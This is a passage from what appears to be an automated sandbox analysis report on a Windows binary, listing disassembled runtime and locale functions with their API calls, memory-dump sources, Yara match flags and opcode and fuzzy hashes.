                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b49e464df8cd9887f9f5fc85569800c21fe91771b7d4add5f8fbefd4ba984765
                                                  • Instruction ID: 5aab37c4b103b9fd90ad100f31a5bc04b07e884212a001980044405564e9c6c0
                                                  • Opcode Fuzzy Hash: b49e464df8cd9887f9f5fc85569800c21fe91771b7d4add5f8fbefd4ba984765
                                                  • Instruction Fuzzy Hash: 5741C6B5C04218AEDB24DF79CC89AEABBB9EF49310F1482DDE41DD3211DA359E848F14
                                                  Function 004214F9 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042154D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2003897158-0
                                                  • Opcode ID: 3034b70ca8a59bcd1a54a412746b10e778b5baf9d18adb7accf15c2e8f28c0ec
                                                  • Instruction ID: 0a4d2d06c034290d104409f0a8c1658b3f82e5bad43bf4f1fbb2ccba27987c0f
                                                  • Opcode Fuzzy Hash: 3034b70ca8a59bcd1a54a412746b10e778b5baf9d18adb7accf15c2e8f28c0ec
                                                  • Instruction Fuzzy Hash: 1421B671714216BBDF289B15EC81EBB33A8EF94314B5001BFF902D6251EB399E818A58
                                                  Function 00681760 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 006790EC
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 00679122
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006817B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2003897158-0
                                                  • Opcode ID: c057830d9f955838873051aea3cb367ccca586cb99bd1b8caf0ec7dac73f1eb9
                                                  • Instruction ID: 135c066c9e5d9f4625854ccaea876e3e854e3f463121f0a490ad26c0b0db9b49
                                                  • Opcode Fuzzy Hash: c057830d9f955838873051aea3cb367ccca586cb99bd1b8caf0ec7dac73f1eb9
                                                  • Instruction Fuzzy Hash: 9A21C572610106ABDB28AF25DC42EFA73ADEF46310B14417EFD16CA241EB35ED468B54
                                                  Function 00421180 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • EnumSystemLocalesW.KERNEL32(004212A6,00000001,00000000,?,-00000050,?,004218D4,00000000,?,?,?,00000055,?), ref: 004211F2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                  • Instruction ID: 1a156f0733b9bda999ead150ec1823f2d34610307ed71135a7bf92de471f7001
                                                  • Opcode Fuzzy Hash: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                  • Instruction Fuzzy Hash: 951129363003019FDB189F79D8916BABB91FF94318B58442EE64687750E7756943C744
                                                  Function 006813E7 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • EnumSystemLocalesW.KERNEL32(004212A6,00000001,00000000,?,-00000050,?,00681B3B,00000000,?,?,?,00000055,?), ref: 00681459
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                  • Instruction ID: 4a8d83728343ede6d27c0a1253cbcb5f62d0d20597fc7629dcf414cfce36d6ac
                                                  • Opcode Fuzzy Hash: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                  • Instruction Fuzzy Hash: 771129362007019FDB18AF39C8915BAB7D6FF84758B14852DE9878BB40D771B943C740
                                                  Function 00421725 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004214C2,00000000,00000000,?), ref: 00421751
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                  • Instruction ID: 555e0e489eff99157af98c992298e2a68b21b4fc6b2928ebd806db451c2e11da
                                                  • Opcode Fuzzy Hash: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                  • Instruction Fuzzy Hash: 38F04932700121BBDB245B20DC05BBB37A8EBC0314F45042AEC02A3290DA38FD42D694
                                                  Function 0068198C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00681729,00000000,00000000,?), ref: 006819B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                  • Instruction ID: af8208fef9ccbc3ebb1189a9801eca2b58f992e2e20505336eac0b5ebe102a99
                                                  • Opcode Fuzzy Hash: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                  • Instruction Fuzzy Hash: 30F0F932600111BBDF286764C816BFB775EEB41754F144629EC16A7280EA70FE43C790
                                                  Function 0042121B Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • EnumSystemLocalesW.KERNEL32(004214F9,00000001,00000001,?,-00000050,?,00421898,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00421265
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                  • Instruction ID: 14f67bad7a4cfcfa4ee4bc3d5db6401a72568cf36d7e4a3035cac00d244dbeff
                                                  • Opcode Fuzzy Hash: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                  • Instruction Fuzzy Hash: 92F04C323003049FDB245F35EC81B7B7B95FF80368B44446EF605876A0C6B55C42C614
                                                  Function 00681482 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • EnumSystemLocalesW.KERNEL32(004214F9,00000001,00000001,?,-00000050,?,00681AFF,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 006814CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                  • Instruction ID: befc5e2cf079742bf303289a400f452b67162b4b0a4b9efcf49f20a3038d3b4c
                                                  • Opcode Fuzzy Hash: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                  • Instruction Fuzzy Hash: E3F0F6363003045FDB246F79D881ABA7BDAEF81768B15852DFA494B690C6B1AC03C754
                                                  Function 0041972F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00414FA9: EnterCriticalSection.KERNEL32(?,?,004165C0,00000000,00435520,0000000C,00416587,?,?,004196BE,?,?,00418FC5,00000001,00000364,00000008), ref: 00414FB8
                                                  • EnumSystemLocalesW.KERNEL32(00419722,00000001,004356C0,0000000C,00419AF0,00000000), ref: 00419767
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                  • Instruction ID: cedf4b0542652410236bfbe7b93f0e3d125763c36bf37d7ca1942f65020527f8
                                                  • Opcode Fuzzy Hash: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                  • Instruction Fuzzy Hash: AEF03276A14204DFE714EF98E852B9CB7B0EB48725F20402FF5189B2E0CB7999808F58
                                                  Function 00679996 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00675210: RtlEnterCriticalSection.NTDLL(?), ref: 0067521F
                                                  • EnumSystemLocalesW.KERNEL32(00419722,00000001,004356C0,0000000C,00679D57,00000000), ref: 006799CE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                  • Instruction ID: bddadfd8115f4718261273de2d7eb7560bb9d2fde17cc9b66a24f0501797fd25
                                                  • Opcode Fuzzy Hash: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                  • Instruction Fuzzy Hash: ACF04972A14704DFD714EF98E842B9D77F1EB08761F20812EF5189B2E0DB795A508F98
                                                  Function 00421135 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • EnumSystemLocalesW.KERNEL32(0042108E,00000001,00000001,?,?,004218F6,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0042116C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                  • Instruction ID: e5017fa5d0c691943728d275092cb8a263cd523bacd6dc2a7f3d241a18a3b7dc
                                                  • Opcode Fuzzy Hash: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                  • Instruction Fuzzy Hash: 6CF0553A30020557CB149F39E84577A7FA0EFC5714B46405EEB098B2A0C6799883C798
                                                  Function 0068139C Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • EnumSystemLocalesW.KERNEL32(0042108E,00000001,00000001,?,?,00681B5D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006813D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                  • Instruction ID: 4042fd14f2a5aced0f840ce824eab6dfe11e15cfd280f12b90e84d954bd42b69
                                                  • Opcode Fuzzy Hash: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                  • Instruction Fuzzy Hash: 2FF0553630020457CB14AF35D845BAA7F95EFC2710B46805CEA098BA90C6B29883C7A4
                                                  Function 00419BF4 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041857E,?,20001004,00000000,00000002,?,?,00417B8B), ref: 00419C28
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: fbb0bd12f0dadb61687aff6c97eb42df5c7e0ff724206f946788ad3c9e0e9366
                                                  • Instruction ID: 917ba661290b8a4deb7db836a8ac3b69315417969e7b9d4f32c12ff31b6cd56c
                                                  • Opcode Fuzzy Hash: fbb0bd12f0dadb61687aff6c97eb42df5c7e0ff724206f946788ad3c9e0e9366
                                                  • Instruction Fuzzy Hash: 8FE0DF3110411CBBCF123F21EC04EEE3F5AEF44720F004026FC0022261CB358DA2AAD9
                                                  Function 00679E5B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006787E5,?,20001004,00000000,00000002,?,?,00677DF2), ref: 00679E8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 8ec4a8ccac36f94d5fb742d1bdb748f86e068ed4b8c627be13f1f3e7e8dff0aa
                                                  • Instruction ID: 68372baff9600b7b2a4091415fb8c62be8d053b33f7173e75160a409050dc476
                                                  • Opcode Fuzzy Hash: 8ec4a8ccac36f94d5fb742d1bdb748f86e068ed4b8c627be13f1f3e7e8dff0aa
                                                  • Instruction Fuzzy Hash: 86E04F31601218BBDF126F60DC09EAE3E5BEF44760F048024FC0D65260DF328D22AAE9
                                                  Function 0040D949 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000D955,0040D4EB), ref: 0040D94E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                  • Instruction ID: cde6de7be7cd455b3e18df9ee2833f47d38776692af0ef052807f8dbc91abbb5
                                                  • Opcode Fuzzy Hash: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                  • Instruction Fuzzy Hash:
                                                  Function 0066DBB0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(0040D955,0066D752), ref: 0066DBB5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                  • Instruction ID: cde6de7be7cd455b3e18df9ee2833f47d38776692af0ef052807f8dbc91abbb5
                                                  • Opcode Fuzzy Hash: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                  • Instruction Fuzzy Hash:
                                                  Function 004124E3 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                  • Instruction ID: 760798cd14c0c86bed722a4dd279e5522f8c51e663d9525b9623c5e101cee0d5
                                                  • Opcode Fuzzy Hash: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                  • Instruction Fuzzy Hash: 9F51357020064876DB388A289BE67FF679B9B16308F54041FD486D73C1D6DD9DE6820E
                                                  Function 00412715 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                  • Instruction ID: 853e48f0d740310cc3a7760be4e74d6cb6a6f8b251400cc0940caf2d61d52f37
                                                  • Opcode Fuzzy Hash: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                  • Instruction Fuzzy Hash: 5F51777060064996EB3CAA2D8B957FFA799AB01304F14011FD892D73D1D6DC9EF6831E
                                                  Function 0067297C Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                  • Instruction ID: 7700cefd5ace0153d29583424536392770ba0143e7ce1186a80b9605355a9dba
                                                  • Opcode Fuzzy Hash: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                  • Instruction Fuzzy Hash: E551DB3060068B56DF388A3988B57FE779B9F11704F18C41ED98EE7382D611DE85D315
                                                  Function 0067274A Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                  • Instruction ID: 9e7a4b8286590e18e731435ec7cb7483bf0fd8731221add620d585f407e09ad6
                                                  • Opcode Fuzzy Hash: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                  • Instruction Fuzzy Hash: 9E51387060074B5ADB3C8A2C89B57FE679BAF52300F18C51ED88EDB382D612DE4D9257
                                                  Function 00424DFF Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: uTB
                                                  • API String ID: 0-3950955333
                                                  • Opcode ID: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                  • Instruction ID: feb5b225c8a083bfb470cfa5e0dae61ad3f57a9261c2ea5476071e4c46a7d3ba
                                                  • Opcode Fuzzy Hash: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                  • Instruction Fuzzy Hash: 3C21B673F20539477B0CC47E8C5227DB6E1D78C501745423EF8A6EA2C1D968D917E2E4
                                                  Function 007743DE Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0076F000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_76f000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: pCw
